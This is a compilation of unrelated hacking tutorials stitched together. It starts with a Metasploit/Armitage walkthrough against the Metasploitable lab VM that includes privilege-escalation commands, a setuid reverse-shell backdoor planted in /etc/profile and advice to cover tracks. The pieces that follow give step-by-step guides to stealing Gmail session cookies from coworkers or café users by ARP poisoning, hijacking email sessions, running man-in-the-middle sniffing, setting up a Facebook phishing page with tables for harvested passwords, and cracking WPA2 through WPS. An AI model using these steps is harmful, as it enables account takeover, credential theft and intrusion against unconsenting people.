Hacking Linux with Armitage

Metasploit is a popular exploitation framework that has seen plenty of coverage on ethicalhacker.net. This article introduces Armitage, a new GUI for Metasploit built around the hacking process. Today, I will show you how to use Armitage to scan a Linux host, find the right exploit, exploit the host, and handle post-exploitation. By following this process, you will learn how to use Armitage and Metasploit in your own work.

The target we will use is the Metasploitable Linux virtual machine. Metasploitable contains several vulnerabilities making it a safe, and, dare I say ethical, training ground for future penetration testers.

Read the Armitage documentation to get Armitage running. Through the rest of this article, I will assume that you have Metasploitable running, Armitage is ready, and that you have downloaded this Python script that we will use later.  Let’s get to work.

Armitage’s User Interface

The Armitage user interface has three parts. The modules area lets you search and launch any of Metasploit’s modules. The targets area displays your active targets and sessions. Below the modules and targets are the tabs. Each dialog, shell, and console is opened in its own tab.

The Armitage User Interface

Scanning

Before we can attack a host, we must first perform our reconnaissance step. Armitage provides several tools for this in the Hosts menu. You can import a vulnerability or port scan, launch NMap, or launch Metasploit’s discovery modules.

I recommend launching NMap outside of Armitage and importing the results. By doing this, you will get feedback on the scan while it runs. To launch a full port scan with OS detection and service identification, use:

nmap -p 1-65535 -T5 -A -v 172.16.146.0/24 -oX scan.xml

Replace 172.16.146.0/24 with your network description or the IP address of Metasploitable. Once the scan is complete, import it into Armitage. Go to Hosts -> Import Hosts -> Nmap Scan Results and select your file. You will now see the Metasploitable Linux box in the Armitage targets view.

 
A Host

To view the results of the NMap scan: right-click the host and select Services. This will bring up a tab showing the results of our scan. The results are grouped into name, port, proto, and info columns.

Metasploitable’s Services

The name column is the name of the service nmap identified on the scanned port. Proto tells you if the service detected uses the UDP or TCP protocol. The port number lets you know which port we’re talking about. And finally, the info column gives you a banner grab from the port. This is very important as it helps us identify which service is running on that port. We’ll use this information to come up with attack options.

Attack: Simple Remote Exploitation

Metasploit has over 650 exploits. If you don’t know which one you want to use, this list may seem intimidating. Fortunately, Armitage can help narrow this list down. Go toAttacks -> Find Attacks -> by port. Armitage will analyze your hosts and build a custom attack menu for each. Wait for the "Attack analysis is complete" dialog before continuing.

Right-click on the target and you’ll notice an attack menu. The attack menu will have submenus for each exploitable service on the target host. Not all of these exploits are applicable, but these are the best candidates.

Looking at the services information (see previous section), we see that Metasploitable is running ProFTPD 1.3.1. Go to Attack -> ftp and select one of the ProFTPD exploits. Selecting an exploit will bring up a dialog with information about the exploit and options you can adjust. If you read the description, you’ll see that the ProFTPD exploits are for a different version of ProFTPD. Drats, this attack won’t work for us.

Armitage’s Exploit Launcher Dialog

Right-click the target again, go to Attack -> Samba -> usermap_script. You’ll notice this is for a specific version of Samba in the 3.0.20-25 range. You’ll also observe from the services tab that our target is running Samba 3.x. We don’t know the exact version it’s running. It’s worth trying the exploit. There are no settings you need to change here. Simply click launch to launch the exploit.

If you’re successful, the target host will turn red with lightning bolts. Congratulations, you’ve exploited the target! Right-click your target and select Shell 1 -> Interact to open a tab with your shell. We’ll cover this more when we get to post-exploitation.

A Compromised Host

If you’re familiar with Metasploit, you may be asking about other payloads. Armitage chooses the Metasploit payload for you. If you’re attacking Windows, Armitage will choose meterpreter. If you’re attacking any other operating system, Armitage will select a command shell payload. If you’re not a Metasploit warrior yet, know that exploits are the delivery mechanism and payloads are the programs that get executed on the exploited host.

Now let’s undo all that work by selecting the Console tab and typing sessions -K. This will kill all existing sessions.

Attack: Web Application Exploitation

In the future, I expect the Metasploit Framework will have a mature capability to audit and attack any web application. Today, there are several exploits for common web applications. Right-click the target, go to Attack -> Webapp to see some of them.

So many web app exploits!

These exploits were chosen, because they’re associated with the open port on your target. Unfortunately, you may not know which of these applications are installed. This is ok as Armitage will help again. Select the check exploits… item at the bottom of this menu.

The check exploits… command will open a console tab and run an active check of each exploit against the selected target. This is accomplished using Metasploit’s check command. Some exploits do not support this, but many of them do.

Once the checks are complete, type Ctrl+F to open a search dialog. Type vulnerable and hit enter. This search will lead you to any exploits that worked.

Found a Working Exploit

You’ll notice that tikiwiki_graph_formula_exec is vulnerable. Right-click the target and select Attack -> Webapp-> tikiwiki_graph_formula_exec. As we did before, click the Launch button when the dialog comes up. Now just wait for the computer to turn red.

To kill this shell, right-click the target and navigate to Shell 2 -> Disconnect.

Attack: Brute Force Login

This next attack will require a few steps. Look at port 8180 in the services tab. From the info field, we can see this port is running Apache Tomcat JSP 1.1.

Click the search field in the module browser. Type tomcat and press enter. There is one exploit for Tomcat:exploit/multi/http/tomcat_mgr_deploy. Double-click this module to open its launch dialog. If you look at the variables, you’ll notice we need a username and a password. We don’t have these yet, so close this launch dialog.

Module Search Results

Metasploit has several auxiliary modules for guessing usernames and passwords. These modules are usually named service_login. Looking at the module search results for tomcat, you’ll auxiliary/http/tomcat_mgr_login. This is what we need. Double-click it to open a launch dialog.

tomcat_mgr_login Dialog

You’ll notice all of the parameters are set including the USERPASS_FILE option. USERPASS_FILE points to a file with a list of usernames and passwords. If you double-click this option in the Option column, Armitage will open a file chooser to let you select another file. Fortunately, this file is fine. Make sure you set RPORT to the correct value though. The target is running Tomcat on port 8180, not the default value of 8080.

Password Guessing Output

Click launch to start the brute force. If you read the output, you’ll notice the login is tomcat:tomcat. That’s easy enough.

Open the launcher for the tomcat_mgr_deploy exploit. Set the RPORT option to 8180 as well. Set USERNAMEand PASSWORD to tomcat. Select the Target of the host. Here we’re attacking a Linux host. Click Launch and wait. Congratulations you have obtained another shell!

Post Exploitation

Now that you’ve learned how to get access to the host, let’s talk about post exploitation. Right-click the compromised host, go to the Shell 3 menu, and select Interact to interact with the shell. This will bring the shell up in its own tab.

Standard console features apply here. You may use the up/down arrows to access your command history. You may also type Ctrl+F if you need to search through the output. If you close the tab, your shell session will still exist. You may open it again by selecting the Interact menu item again.

To find out who you are, type: id in the shell. You’ll see from the Tomcat attack that you’re tomcat55. Let’s work on getting root.

Privilege Escalation

Privilege escalation in Linux is something that depends on your environment. If you’re looking for some ideas, visit http://www.exploit-db.com and search for recent local exploits on Linux. One bug found by Tavis Ormandy stands out. This bug allows us to create a new world-writeable file owned by the root user anywhere on the system. Tavis’s example writes a file to crontab and uses that to run our desired commands as the root user. In my tests, crontab did not execute these commands on Metasploitable. This happens. So, what else can we do? Examining other recent advisories, you’ll learn about the Ubuntu mountall privilege escalation vulnerability. A bug in the mountall utility leaves a world-writeable root.rules file in /dev/.udev/rules.d. Anyone capable of writing to this file can use it to execute arbitrary commands as the root user. A quick ls reveals that root.rules doesn’t exist in this folder. Maybe this is not our lucky day.

Do you see any options? Let’s modify Tavis’s example to create a world-writeable root.rules file and get a root shell through it. Type the following commands into your target’s shell:

umask 0
export LD_AUDIT="libpcprofile.so"
export PCPROFILE_OUTPUT="/dev/.udev/rules.d/root.rules"
ping
export LD_AUDIT=""
cd /tmp

You will now have a world-writeable root.rules file in /dev/.udev/rules.d. You now need to upload mountall-CVE-2010-2961.py to the Metasploitable host. Right-click in the shell window and select the Upload… menu item. Navigate to the mountall-CVE-2010-2961.py file and click Open. Armitage will use the UNIX printf command to upload the file. Since the file is so small, the upload will be instant. If the file were larger, Armitage would display the upload progress.

This Python script populates the root.rules file with commands to create a setuid shell at /tmp/toor. It also generates UDEV events to force the system to evaluate the rules file. Run this python script on the target to get root:

python mountall-CVE-2010-2961.py
whoami 

Armitage Privilege Escalation

Congratulations, you’re now root. Make sure to cover your tracks by deleting the root.rules, the mountall-CVE-2010-2961.py, and /tmp/toor files.

Persistence

Once you have root, the next step is to add a backdoor to keep your access. Clear the module browser search box and hit enter. This will restore the default module list. Navigate to payload/linux/x86/shell_reverse_tcp. Double-click shell_reverse_tcp to open a launch dialog.

Here you can generate a Metasploit payload executable. Change the LPORT value to 1234. Select elf for the output type. Elf is a file format for executables on Linux. Click Launch and save the file as backdoor. Now we have a program that will connect to our attack box on port 1234 with a shell when run.

Now let’s set up a listener for our callback shell. Go to Armitage -> Listeners -> Reverse. Type 1234 as the port and click Start Listener.

Right-click in the shell window and select Upload… to upload backdoor to the target host. Type the following commands:

mv backdoor /usr/bin/setup.host
chmod +x /usr/bin/setup.host
chmod ug+s /usr/bin/setup.host
echo "setup.host &n" >>/etc/profile 

These commands add our setuid backdoor to the global profile file. When a user logs in, we will receive a root shell from our target.

Kill all shell sessions with sessions -K in the Metasploit console. Switch to the Metasploitable virtual machine. Login as the user msfadmin with the password msfadmin. If you look at Armitage, you should see a new shell session. Open it up and type whoami.

Conclusion

I’ve shown you how to attack a Linux machine. You saw how to use nmap to scan the target. You learned how to interpret the results of the scan to find and launch attacks. You also learned how to escalate your privileges and persist yourself.

While Metasploit and Armitage weren’t the only tools in this adventure, you can see how they aided this process. Armitage does not hack for you, but it provides tools (e.g., the printf upload feature) to make the process easier.

Some of the steps from this article are shown in the following video. Watch it to whet your appetite. To get the most out of this article, download the materials mentioned and carry out this scenario yourself. If you want to challenge yourself, try getting into Metasploitable in other ways. Good luck and happy hacking!

How to hack a Gmail account using GX Cookie

Hacking web application was always curious for the script kiddies. And hacking free web email account is every geek first attempt. The method which I will describe in this post is not new; the same method can be applied to yahoo and other free web email services too.

The method we will be using is cookie stealing and replaying the same back to the Gmail server. There are many ways you can steal cookie, one of them is XSS (Cross site scripting) discussed by other is earlier post. But we won’t be using any XSS here, in our part of attack we will use some local tool to steal cookie and use that cookie to get an access to Gmail account.

Assumption:

• You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.
• You know basic networking.

Tool used for this attack:

• Cain & Abel
• Network Miner
• Firefox web browser with Cookie Editor add-ons

Attack in detail:

We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in lunch time in office, or during shift start people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.

We will go step by step,
If you are using Wireless network then you can skip this Step A.

A] Using Cain to do ARP poisoning and routing:

Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients). 

• Start Cain from Start > Program > Cain > Cain
• Click on Start/Stop Snigger tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the victim.
• Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select

All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list. 
How to check your physical IP ?
> Click on start > Run type cmd and press enter, in the command prompt type 
Ipconfig and enter. This should show your IP address assign to your PC.
It will have following outputs:


Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xyz.com
IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

• Click on Configure > APR > Use Spoof ed IP and MAC Address > IP

Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.

• Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.

The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.

• Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.

B] Using Network Miner to capture cookie in plain text

We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.

We are using This tool because of its ease to use.

• Open Network Miner by clicking its exe (pls note it requires .Net framework to work).
• From the “---Select network adaptor in the list---“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.

Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.

• Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.
• Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon (GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon

Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv

Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.

C] Using Firefox & cookie Editor to replay attack.

• Open Firefox and log in your gmail email account.
• from firefox click on Tools > cookie Editor.
• In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.
• From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.
• Sorry! You can’t change password with cookie attack.

How to be saved from this kind of attack?
Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings. 
Settings > Browser connection > Always use https

How to Hack an Email Account with Cookies

If you are a newbie and don't know about cookie, then for your information, Cookie is a piece of text stored on user computer by websites visited by the user. This stored cookie is used by webserver to identify and authenticate the user. So, if you steal this cookie (which is stored in victim browser) and inject this stealed cookie in your browser, you can imitate victim identity to webserver and enter hisEmail account easily. This is called Session Hijacking. Thus, you can easily hack Email account using such Cookie stealing hacks. 

Tools needed for Cookie stealing attack:

Cookie stealing attack requires two types of tools:

1. Cookie capturing tool
2. Cookie injecting/editing tool

1. Cookie capturing tool:
Suppose, you are running your computer on a LAN. The victim too runs on same LAN. Then, you can use Cookie capturing tool to sniff all the packets to and from victim computer. Some of the packets contain cookie information. These packets can be decoded using Cookie capturing tool and you can easily obtain cookie information necessary to hackEmail account. Wireshark and HTTP Debugger Pro softwares can be used to capture cookies. 

Update: Check out my Wireshark tutorial for more information on cookie capturing tool.

2. Cookie injecting/editing tool:

Now, once you have successfully captured your victim cookies, you have inject those cookies in your browser. This job is done using Cookie injecting tool. Also, in certain cases after injection, you need to edit cookies which can be done by Cookie editing tool. This cookie injection/editing can be done using simple Firefox addons Add N Edit Cookies and Greasemonkey scripts. I will write more on these two tools in my future articles.

Drawbacks of Cookie Stealing:

Cookie Stealing is neglected because it has some serious drawbacks:

1. Cookie has an expiry time i.e. after certain trigger cookie expires and you cannot use it to hijack victim session. Cookie expiry is implemented in two ways:
   1. By assigning specific timestamp(helpful for us).
   2. By checking for triggers like user exiting from webbrowser. So, in such cases, whenever user exits from his browser, his cookie expires and our captured cookie becomes useless.
2. Cookie stealing becomes useless in SSL encrypted environment i.e. for https (Secure HTTP) links. But, most Email accounts and social networking sites rarely use https unless vicitm has manually set https as mandatory connection type.
3. Also, most cookies expire once victim hits on LogOut button. So, you have to implement this Cookie stealing hack while user is logged in. But, I think this is not such a serious drawback because most of us have the habit of checking "Remember Me". So, very few people actually log out of their accounts on their PCs.

So friends, this was a short tutorial on basics of how to hack Email account using Cookie Stealing.As I have stated, Cookie stealing has some disadvantages. But, I think Cookie stealing is a handy way to hack an Email account. In my next articles, I will post detailed tutorial to hack Facebook and Gmail accounts using Cookie stealing. If you have any problem in this tutorial on how to hack Email account using Cookie stealing, please mention it in comments.

Enjoy Cookie stealing trick to hack Email account.

Kali Linux in the Middle Attack

Today our tutorial will talk about Kali Linux Man in the Middle Attack. How to perform man in the middle attack using Kali Linux?we will learn the step by step process how to do this.

I believe most of you already know and learn about the concept what is man in the middle attack, but if you still don't know about this, here is some definition from wikipedia.

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

Scenario:

This is the simple scenario, and I try to draw it in a picture.

Victim IP address : 192.168.8.90

Attacker network interface : eth0; with IP address : 192.168.8.93

Router IP address : 192.168.8.8

Requirements:

1. Arpspoof

2. Driftnet

3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because act as man in the middle attacker, Kali Linux must act as router between "real router" and the victim. Read the tutorial here how to set up packet forwarding in linux.

2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting kali linux terminal window.

3. The next step is setting up arpspoof between victim and router.

arpspoof -i eth0 -t 192.168.8.90 192.168.8.8

4. And then setting up arpspoof from to capture all packet from router to victim.

arpspoof -i eth0 192.168.8.8 192.168.8.90

5. After step three and four, now all the packet sent or received by victim should be going through attacker machine.

6. Now we can try to use driftnet to monitor all victim image traffic. 

Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

7. To run driftnet, we just run this

driftnet -i eth0

When victim browse a website with image, driftnet will capture all image traffic as shown in the screenshot below.

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal

8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code

urlsnarf -i eth0

and urlsnarf will start capturing all website address visited by victim machine.

9. When victim browse a website, attacker will know the address victim visited.

5 Steps How to Hack Facebook Account Password

Requirement:

1. Facebook offline page (download)

2. MySQL Table Query (the MySQL table for this tutorial)

--
-- Table structure for table `fb_fail`
--

CREATE TABLE IF NOT EXISTS `fb_fail` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `uname` varchar(255) NOT NULL,
  `pwd` varchar(255) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `fb_login`
--

CREATE TABLE IF NOT EXISTS `fb_login` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `uname` varchar(255) NOT NULL,
  `pwd` varchar(255) NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;

--
-- Dumping data for table `fb_login`
--

5 Steps How to Hack Facebook Account Password:

1. Download the facebook offline file from the link above.

2. Inside the facebook.rar file there are 3 files (index.php, login.php, and view.php) you need to configure 2 of them (login.php and view.php) to match with your database server configuration.

3. In this third step, you can view my previous tutorial about how to hack facebook account using phishing method (see the tutorial here)

4. This is the fake facebook page interface preview screenshot using my browser.

5. If someone logged in, we can view the harvested passwords in view.php page.

Update!!:

Learn step by step install fake facebook page on local computer

Hack Facebook Scam tutorial

Countermeasure:

1. See carefully the browser address bar URL, do not continue to browse if you find the URI is mistyping, only facebook.com the real one.

2. If you type your username and password correctly, but the facebook page redirect you to wrong username or password error page, see the browser address bar URL in case you open the fake facebook page.

Hope you found it useful 

5 Steps Wifi Hacking – Cracking WPA2 Password

After the long holiday, first I want to say Merry Christmas and Happy new year 2014 to you. Today we will learn about 5 Steps Wifi Hacking – Cracking WPA2 Password. A lot of readers send many request regarding how to crack wireless WPA2 password in our request tutorial page.

According to Wikipedia :

Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, WEP (Wired Equivalent Privacy)

A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup (WPS), allows WPA and WPA2 security to be bypassed and effectively broken in many situations. Many access point they have a Wifi Protected Setup enabled by default (even after we hard reset the access point).

Requirements:

1. Wireless card (support promiscuous mode)

In this tutorial I use ALFA AWUS036H from Amazon.

2. Access point with WPA2 and WPS enables

5 Steps Wifi Hacking – Cracking WPA2 Password:

1. Open our terminal (CTRL+ALT+T) and type airmon-ng - this command will lists our wireless card that attached with our system.

2. The next step we need to stop our wireless monitor mode by running airmon-ng stop wlan0

3. Now we ready to capture the wireless traffic around us. By running airodump-ng wlan0 our wireless interface will start capturing the data.

From the picture above, we can see many available access point with all the information. In the green box is our victim access point which is my own access point 

Information:

BSSID (Basic Service Set Identification): the MAC address of access point

PWR: Signal level reported by the card.

Beacons: Number of announcements packets sent by the AP

#Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.

#/s: Number of data packets per second measure over the last 10 seconds.

CH: Channel number (taken from beacon packets).

MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.

ENC: Encryption algorithm in use.

CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.

AUTH: The authentication protocol used.

ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.

4. From the step 3 above, we can find access point with encryption algorithm WPA2 and note the AP channel number. Now we will find out whether target AP has WPS enabled or not.

wash -i wlan0 -c 8 -C -s

If the WPS Locked status is No, then we ready to crack and move to step 5.

5. The last step is cracking the WPA2 password using reaver.

reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360

Because we already get the information from step 3 above, so my command look like this:

reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360

it took about 5 hours to crack 19 characters WPA2 password (vishnuvalentino.com) from my Kali virtualBox, but it depend with our hardware and wireless card.

Conclusions:

1. WPA and WPA2 security implemented without using the Wi-Fi Protected Setup (WPS) feature are unaffected by the security vulnerability.

2. To prevent this attack, just turn off our WPS/QSS feature on our access point. See picture below (I only have the Chinese version  )

Notes: Only practice this tutorial on your own lab and your own device.Hacking can be a crime if you don't know where to put it.

f